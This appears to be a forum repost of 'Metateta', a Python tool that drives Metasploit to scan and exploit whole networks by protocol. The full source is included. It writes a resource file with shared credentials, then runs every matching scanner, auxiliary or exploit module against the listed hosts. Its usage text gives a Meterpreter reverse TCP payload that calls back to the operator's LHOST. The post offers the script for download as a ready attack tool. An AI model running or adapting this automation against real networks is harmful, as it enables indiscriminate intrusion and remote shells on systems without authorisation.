Active Members Fi8sVrs Posted June 13, 2018 Active Members Report Posted June 13, 2018 Metateta Metateta Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit For faster pen testing for large networks What You Can Do Scanning with all metasploit modules for specific network Protocol like smb,smtp,snmp Run all Auxiliary modules against specific network Protocol Run all Possible Metasploit Exploits for specific network Protocol That's is not recommended for real pen testing Can Run against one target or network or even text file with targets Using example's -R -p smb -x exploit -r -p smtp -x scan -f hosts.txt -p smb -x auxiliary Author: Hossam Mohamed – @wazehell Download: git clone Mirror: Spoiler #!/usr/bin/env python # -*- coding: utf-8 -*- #Author WazeHell @wazehell from commands import getoutput import os,random,sys,optparse def run_up(): print("Starting Metasploit ......") return os.system("msfconsole -r meta.rc") def clean(): return os.system("") def get_scanners(protocol): scanners = [] cc = 'locate "*auxiliary/scanner/*'+protocol+'*.rb"' for ss in getoutput(cc).splitlines(): start = ss.index( '/modules/' ) + len( '/modules/' ) end = ss.index( '.rb', start ) rzlt = ss[start:end] scanners.append(rzlt) return scanners def get_auxiliary(protocol): auxiliarys = [] cc = 'locate "*auxiliary/*'+protocol+'*.rb"' for ss in getoutput(cc).splitlines(): start = ss.index( '/modules/' ) + len( '/modules/' ) end = ss.index( '.rb', start ) rzlt = ss[start:end] auxiliarys.append(rzlt) return auxiliarys def get_exploits(protocol): exploits = [] cc = 'locate "*exploits*'+protocol+'*.rb"' for ss in getoutput(cc).splitlines(): print(ss) try: start = ss.index( '/modules/' ) + len( '/modules/' ) end = ss.index( '.rb', start ) rzlt = ss[start:end] exploits.append(rzlt) except: pass return exploits def set_targets(rhosts,rhost,lhost,lport,payload,scannerlist,user,password): sw = open('meta.rc','a+') temp = "setg RHOSTS "+rhosts+" \n" temp+= "setg RHOST "+rhost+" \n" temp+= "setg SRVHOST "+rhost+" \n" temp+= "setg SRVHOSTs "+rhost+" \n" temp+= "setg LHOST "+lhost+" \n" temp+= "setg LPORT "+lport+" \n" temp+= "setg SMBUser "+user+" \n" temp+= "setg SMBPass "+password+" \n" temp+= "setg USERNAME "+user+" \n" temp+= "setg PASSWORD "+password+" \n" temp+= "setg USER "+user+" \n" temp+= "setg PASS "+password+" \n" temp+= "setg FTPUSER "+user+" \n" temp+= "setg FTPPASS "+password+" \n" temp+= "setg SMTPUSERNAME "+user+" \n" temp+= "setg SMTPPASSWORD "+password+" \n" temp+= "setg HttpUsername "+user+" \n" temp+= "setg HttpPassword "+password+" \n" temp+= "setg BasicAuthUser "+user+" \n" temp+= "setg BasicAuthPass "+password+" \n" temp+= "setg DBPASS "+password+" \n" temp+= "setg DBUSER "+user+" \n" temp+= "setg IMAPPASS "+password+" \n" temp+= "setg IMAPUSER "+user+" \n" temp+= "setg SSH_USERNAME "+user+" \n" temp+= "setg SSH_PASSWORD "+password+" \n" sw.write(temp) for scanner in scannerlist: da = "use [scanner]"+"\n" da+= "run"+"\n" fe = da.replace('[scanner]',scanner) sw.write(fe) sw.close() return True def target_list(hostsfile,protocol,rhosts,rhost,lhost,lport,payload,scannerlist,user,password): togo = get_exploits(protocol) ff = open(hostsfile,'r') for target in ff: target = target.rstrip() set_targets(rhosts,rhost,lhost,lport,payload,togo,user,password) return True if __name__ == '__main__': banner = """ ───▄▄▄ ─▄▀░▄░▀▄ ─█░█▄▀░█ ─█░▀▄▄▀█▄█▄▀ ▄▄█▄▄▄▄███▀ Metateta Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit By : WazeHell """ print(banner) try: parser = optparse.OptionParser() parser.add_option('-R', action = "store", dest = "rhosts", default = "", type = "string", help = "set remote hosts : -R") parser.add_option('-p', action = "store", dest = "protocol", default = "", type = "string", help = "set protocol : -R -p smb") parser.add_option('-f', action = "store", dest = "hostsfile", type = "string", help = "set hosts file : -f hosts.txt -p smb ") parser.add_option('-r', action = "store", dest = "rhost", default = "", type = "string", help = "set remote host : -r -p smb") parser.add_option('-l', action = "store", dest = "lhost", default = "", type = "string", help = "set LHOST : -f hosts.txt -l -p smb") parser.add_option('-i', action = "store", dest = "lport", default = "", type = "string", help = "set local port : -f hosts.txt -l -i 4444 -p smb") parser.add_option('-u', action = "store", dest = "payload", default = "", type = "string", help = "set payload : -f hosts.txt -l -i 4444 -u windows/x64/meterpreter/reverse_tcp -p smb") parser.add_option('-U', action = "store", dest = "user", default = "''", type = "string", help = "set user : -f hosts.txt -U user -P PASS@2WORD -p smb") parser.add_option('-P', action = "store", dest = "password", default = "''", type = "string", help = "set password : -f hosts.txt -U user -P PASS@2WORD -p smb") parser.add_option('-x', action = "store", dest = "use", default = "", type = "string", help = "set tool mode : -f hosts.txt -U user -P PASS@2WORD -p smb -x scan") (option,args) = parser.parse_args() if not option.rhost: print "Pls Set RHOSTS or RHOST \n" , parser.print_help() sys.exit(0) elif not option.rhosts: print "Pls Set RHOSTS \n" , parser.print_help() sys.exit(0) elif not option.protocol: print "Pls Set Protocol \n" , parser.print_help() sys.exit(0) elif not option.use: print "Pls Set Mode : exploit or scan or auxiliary \n" , parser.print_help() sys.exit(0) if option.use == 'scan': scn = get_scanners(option.protocol) if option.hostsfile: target_list(option.hostsfile, option.protocol, option.rhosts, option.rhost, option.lhost , option.lport , option.payload , scn , option.user , option.password) run_up() clean() else: set_targets(option.rhosts, option.rhost, option.lhost , option.lport , option.payload , scn , option.user , option.password) run_up() clean() elif option.use == 'exploit': exp = get_exploits(option.protocol) if option.hostsfile: target_list(option.hostsfile, option.protocol, option.rhosts, option.rhost, option.lhost , option.lport , option.payload , exp , option.user , option.password) run_up() clean() else: set_targets(option.rhosts, option.rhost, option.lhost , option.lport , option.payload , exp , option.user , option.password) run_up() clean() elif option.use == 'auxiliary': aux = get_auxiliary(option.protocol) if option.hostsfile: target_list(option.hostsfile, option.protocol, option.rhosts, option.rhost, option.lhost , option.lport , option.payload , aux , option.user , option.password) run_up() clean() else: set_targets(option.rhosts, option.rhost, option.lhost , option.lport , option.payload , aux , option.user , option.password) run_up() clean() except KeyboardInterrupt: print('\n Exit.') sys.exit(0) Source Quote